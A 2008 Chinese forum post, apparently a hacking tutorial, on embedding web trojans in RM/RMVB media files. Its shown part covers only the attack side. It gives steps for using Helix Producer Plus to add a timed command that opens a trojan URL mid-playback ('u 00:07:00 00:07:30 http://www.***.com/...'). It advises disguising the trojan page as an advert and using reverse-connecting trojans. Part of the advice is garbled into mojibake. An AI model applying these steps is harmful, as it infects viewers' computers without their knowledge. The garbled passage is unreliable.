危害巨大媒体文件木马攻防实战(组图)

与你同行 · 发表于 2008-12-4 10:11:16

马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。

您需要登录才可以下载或查看，没有帐号？注册

x

　　如今网络上流传最为广泛的媒体文件有两类，一类是RM、RMVB文件，另一类是WMV、WMA文件，由于它们对流媒体的良好支持，使网络上的电影、音乐等媒体文件几乎都采用了这两种媒体文件格式，因此，如果在媒体文件中植入木马，那么媒体文件中木马独有的隐蔽性将会使受害者在不知不觉中被网页木马侵害，危害性可见一斑。
　　
　　攻：媒体文件种马于无形
　　
　　RM、RMVB中加入木马
　　
　　Helix Producer Plus是一款图形化的专业流媒体文件制作工具，我们可以利用Helix Producer Plus这款软件把其他格式的文件转换成RM或RMVB格式，当然也可以对已存在的RM文件进行重新编辑，在编辑的同时，我们可以把事先准备好的网页木马插入其中。这样只要一打开这个编辑好的媒体文件，插入在其中的网页木马也会随之打开，我们甚至还能控制网页木马打开的时间，让网页木马更隐蔽。
　　
　　步骤1：首先下载Helix Producer Plus，一路“Next”完成安装，然后我们要找一个能把网页木马插入其中的RM电影文件，把它改名为film.rm，然后拷贝到Helix Producer Plus安装目录的RealMediaEditor文件夹下。
　　
　　步骤2：我们在这个文件夹中新建一个文本文档，命名为test.txt，在test.txt文件中写入这样一句命令：“u 00:07:00 00:07:30 http://www.***.com/index.php”，这句命令的意思是当媒体文件播放到第7分钟后触发打开URL事件，然后到7分30秒的时候事件结束，最后面的就是URL的网址，我们可以把这个网址改成我们的网页木马的地址（关于网页木马的制作和设置已经多次介绍，在此不再重复），这样便可以在别人看媒体文件的时候打开网页木马，让他不知不觉中招（如图1）。
　　　

　　小提示：对于制作的网页木马应尽量隐蔽，并模仿正常网页，否则在看媒体文件时突然弹出网页谁都会有疑心，当然把它做成类似的广告网页效果最好，别人会以为江西广告网愀妫阋还亓酥馐蔽颐且丫致沓晒α恕６杂谀韭淼难≡裼×渴褂镁哂蟹聪蛄拥哪韭恚缁腋胱樱裨蚣词褂辛松习俚娜饧Γ桓鲆桓鋈チ右彩呛苈榉车摹

		自动登录	找回密码
密码			注册

危害巨大 媒体文件木马攻防实战(组图)

马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。

危害巨大媒体文件木马攻防实战(组图)